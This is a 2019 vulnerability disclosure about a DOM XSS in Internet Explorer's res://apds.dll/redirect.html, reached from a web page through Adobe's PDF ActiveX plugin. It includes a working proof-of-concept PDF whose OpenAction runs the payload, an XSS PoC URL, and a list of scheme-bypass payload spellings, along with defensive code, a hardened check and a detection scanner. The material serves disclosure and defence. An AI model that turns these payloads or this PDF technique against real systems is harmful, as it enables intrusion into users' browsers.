From http:// domain to res:// domain xss by using IE Adobe’s PDF ActiveX plugin
Author: Heige(a.k.a Superhei) of KnownSec 404 Team
Date: 03/19/2019
1. res://apds.dll/redirect.html dom xss
https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&desc=5 had already reported an XSS vulnerability in res://apds.dll/redirect.html, and this vulnerability has not been fixed until now.
It is a typical DOM XSS: the target parameter is read from the query string, decoded, and handed straight to window.location.replace() without any check on its scheme, so a javascript: URL is executed in the res:// document. The code of res://apds.dll/redirect.html:
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<script type="text/javascript">
var targetParamRegex = /[\?\&]target=([^\&\#]+)/i;
var targetResults = targetParamRegex.exec(window.location.search);
if (targetResults) {
window.location.replace(decodeURIComponent(targetResults[1]));
}
</script>
</head>
<body>
</body>
</html>
PoC:
res://apds.dll/redirect.html?target=javascript:alert(1)
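As an added example (not part of the original advisory, and not the code of apds.dll), the following Node.js script reproduces the redirector's target extraction as a pure function, runs it over constructed query strings that reach the same javascript: scheme by different spellings, and places a hardened variant beside it that parses the decoded value as a URL and follows only http: or https:. The origin https://example.com/, the function names and all sample inputs are assumptions made for the demonstration.

```javascript
// Added example for this page, not code from the advisory or from apds.dll.
// vulnerableTarget() re-implements the redirector's target handling as a pure
// function; safeTarget() is a hardened variant. Samples and the origin
// https://example.com/ are constructed for the demonstration.

// Same regex and decoding as res://apds.dll/redirect.html: the decoded value
// is what the page hands to window.location.replace() without any check.
function vulnerableTarget(search) {
  const targetParamRegex = /[\?\&]target=([^\&\#]+)/i;
  const targetResults = targetParamRegex.exec(search);
  // decodeURIComponent throws URIError on malformed percent-encoding, exactly
  // as the original page would (the redirect then simply does not happen).
  return targetResults ? decodeURIComponent(targetResults[1]) : null;
}

// Hardened variant: resolve the decoded value against the page origin with the
// URL parser and allow only http: and https:. Checking the parsed scheme, not
// the raw text, is what defeats case variants ("JavaScript:"), encoded colons
// ("javascript%3A"), encoded letters ("%6aavascript:"), embedded tabs that the
// parser strips ("java\tscript:"), and other active schemes (data:, vbscript:).
function safeTarget(search, pageOrigin) {
  let parsed;
  try {
    const raw = vulnerableTarget(search);
    if (raw === null) return null;
    parsed = new URL(raw, pageOrigin);
  } catch (e) {
    return null; // malformed encoding or unparsable URL: do not redirect
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  return parsed.href;
}

// Constructed query strings; the first five all reach javascript: or data: URLs.
const SAMPLES = [
  '?target=javascript:alert(1)',
  '?target=JavaScript%3Aalert(1)',
  '?target=%6aavascript:alert(1)',
  '?target=java%09script:alert(1)',
  '?target=data:text/html,<script>alert(1)</script>',
  '?target=https://example.com/next',
  '?target=/relative/path',
  '?target=%E0%A4%A',
  '?other=1',
];

// One row per sample: what the vulnerable page would redirect to, and what the
// hardened check lets through (null means "refused").
function evaluate(samples, pageOrigin) {
  return samples.map((search) => {
    let decoded;
    try {
      decoded = vulnerableTarget(search);
    } catch (e) {
      decoded = `threw ${e.name}`;
    }
    return { search, decoded, allowed: safeTarget(search, pageOrigin) };
  });
}

console.table(evaluate(SAMPLES, 'https://example.com/'));
```

Run it with node; console.table prints one row per sample. The hardened check is about the scheme only: it still follows any http(s) host, so it stops the XSS but not an open redirect. Restricting the parsed hostname to the page's own origin, or to an allowlist, closes that as well.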
2. from http:// domain to res:// domain
Usually, accessing res:// resources from an http:// domain is not allowed. The JavaScript function xfa.host.gotoURL() in Adobe PDF can open many kinds of URL, including http(s)://, file://, etc. Of course, in general there will be a security prompt when you open such a PDF file. But when we use xfa.host.gotoURL() to access res:// or http(s):// through Adobe's PDF ActiveX plugin in IE:
xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");
there is no security alert, and the XSS payload alert(1) is executed.
PoC:
http://xxxxxxx/r.pdf
r.pdf code:
%PDF-1.4
1 0 obj
<<>>
endobj
% object 2 is the XFA packet referenced from /AcroForm /XFA
2 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
<interactive>1</interactive>
</pdf></present></config><template>
<subform name="a">
<pageSet/>
</subform>
</template>
</xdp:xdp>
endstream
endobj
trailer
<<
/Root
<<
/Pages <<>>
/AcroForm
<<
/XFA 2 0 R
>>
% /OpenAction: the JavaScript below runs as soon as the document is opened
/OpenAction
<<
/S/JavaScript
/JS(
xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");
)
>>
>>
>>
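As an added example (not part of the original advisory), here is a Node.js triage script for the detection side: it scans a raw PDF for /JS literal strings that call xfa.host.gotoURL(), reports the scheme of each target, and flags non-web schemes such as res:// or file:// as well as javascript: values passed through the target query, the pattern used by r.pdf above. It also decodes #xx name escapes so that /#4FpenAction still matches /OpenAction. The embedded samples are the PoC from this advisory and a constructed benign variant; the function names are assumptions. The script does not inflate FlateDecode streams or read hex <...> strings, so compressed or obfuscated samples need those decoded first.

```javascript
// Added example, not code from the original advisory: a Node.js triage scan of
// a raw (uncompressed) PDF for JavaScript that calls xfa.host.gotoURL() with a
// non-web target such as res:// or file://, or that reaches a res:// redirector
// with a javascript: value in the query. Limitations: no stream inflation, no
// hex <...> strings; literal "( ... )" strings only.

// Constructed sample: the r.pdf PoC from this advisory, embedded as-is.
const SAMPLE_POC_PDF = `%PDF-1.4
1 0 obj
<<>>
endobj
2 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
<interactive>1</interactive>
</pdf></present></config><template>
<subform name="a">
<pageSet/>
</subform>
</template>
</xdp:xdp>
endstream
endobj
trailer
<<
/Root
<<
/Pages <<>>
/AcroForm
<<
/XFA 2 0 R
>>
/OpenAction
<<
/S/JavaScript
/JS(
xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");
)
>>
>>
>>
`;

// Constructed benign sample: same structure, but the action opens an https:// URL.
const SAMPLE_BENIGN_PDF = SAMPLE_POC_PDF.replace(
  'res://apds.dll/redirect.html?target=javascript:alert(1);//',
  'https://example.com/report'
);

// PDF names may escape bytes as #xx (e.g. /#4FpenAction for /OpenAction).
// Decoding the whole text is a triage shortcut: a "#" followed by two hex
// digits inside a string literal would be decoded too.
function normalizeNames(pdfText) {
  return pdfText.replace(/#([0-9A-Fa-f]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

// Return the contents of every "/JS ( ... )" literal string. PDF literal strings
// may contain balanced parentheses unescaped, so cutting at the first ")" would
// truncate gotoURL("..."); track depth and honour backslash escapes (the escaped
// character is kept as-is, which is enough for matching).
function extractJsStrings(pdfText) {
  const out = [];
  const re = /\/JS\s*\(/g;
  let m;
  while ((m = re.exec(pdfText)) !== null) {
    let depth = 1;
    let i = m.index + m[0].length;
    let buf = '';
    while (i < pdfText.length && depth > 0) {
      const ch = pdfText[i];
      if (ch === '\\' && i + 1 < pdfText.length) {
        buf += pdfText[i + 1];
        i += 2;
        continue;
      }
      if (ch === '(') depth++;
      if (ch === ')') depth--;
      if (depth > 0) buf += ch;
      i++;
    }
    out.push(buf);
    re.lastIndex = i;
  }
  return out;
}

// Pull the string argument of each xfa.host.gotoURL("...") or ('...') call.
function gotoUrlTargets(js) {
  const targets = [];
  const re = /xfa\.host\.gotoURL\s*\(\s*(["'])((?:(?!\1).)*)\1/g;
  let m;
  while ((m = re.exec(js)) !== null) targets.push(m[2]);
  return targets;
}

function schemeOf(url) {
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(url.trim());
  return m ? m[1].toLowerCase() : null;
}

// Non-web schemes reach local resources; a javascript: value after "?" is the
// redirector-chaining pattern used against res://apds.dll/redirect.html.
function classifyTarget(target) {
  const scheme = schemeOf(target);
  const nonWeb = scheme !== null && scheme !== 'http' && scheme !== 'https';
  const query = target.slice(target.indexOf('?') + 1); // whole string if no "?"
  const chainsJavascript = /javascript\s*:/i.test(query);
  const reasons = [];
  if (nonWeb) reasons.push(`non-web scheme ${scheme}://`);
  if (chainsJavascript) reasons.push('javascript: passed through the target query');
  return { target, scheme, severity: reasons.length ? 'high' : 'info', reasons };
}

// pdfBytes: a string or a Buffer; returns one finding per gotoURL target.
function scanPdf(pdfBytes) {
  const raw = typeof pdfBytes === 'string' ? pdfBytes : pdfBytes.toString('latin1');
  const text = normalizeNames(raw);
  const onOpen = /\/OpenAction\b/.test(text);
  const findings = [];
  for (const js of extractJsStrings(text)) {
    for (const t of gotoUrlTargets(js)) findings.push({ ...classifyTarget(t), onOpen });
  }
  return findings;
}

console.log(JSON.stringify(scanPdf(SAMPLE_POC_PDF), null, 2));
console.log(JSON.stringify(scanPdf(SAMPLE_BENIGN_PDF), null, 2));
```

For the PoC the script reports one high-severity finding with scheme res, both reasons, and onOpen true; the benign variant yields a single info finding. Because this is a string-level heuristic, treat a clean result as "nothing visible in the uncompressed text", not as proof that the file is safe.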
3. fixed?
Because of IE's security zone isolation, the impact of an XSS in the res:// domain is limited. But I think Microsoft should actively fix the res://apds.dll/redirect.html XSS vulnerability, and Adobe should either disable the URL redirect or show a corresponding security warning when it happens. The world can be more beautiful and harmonious!
4. Timeline
- October 04, 2018 Report it to Adobe PSIRT and MSRC
- October 05, 2018 Adobe tracking number PSIRT-8981.
- October 09, 2018 MSRC Case 47932 CRM:0461065793
- October 18, 2018 Adobe PSIRT reports that it is still investigating.
- November 21, 2018 MSRC: "We have completed our investigation and determined that the case doesn't meet the bar for immediate servicing in a security update."
- March 19, 2019 Public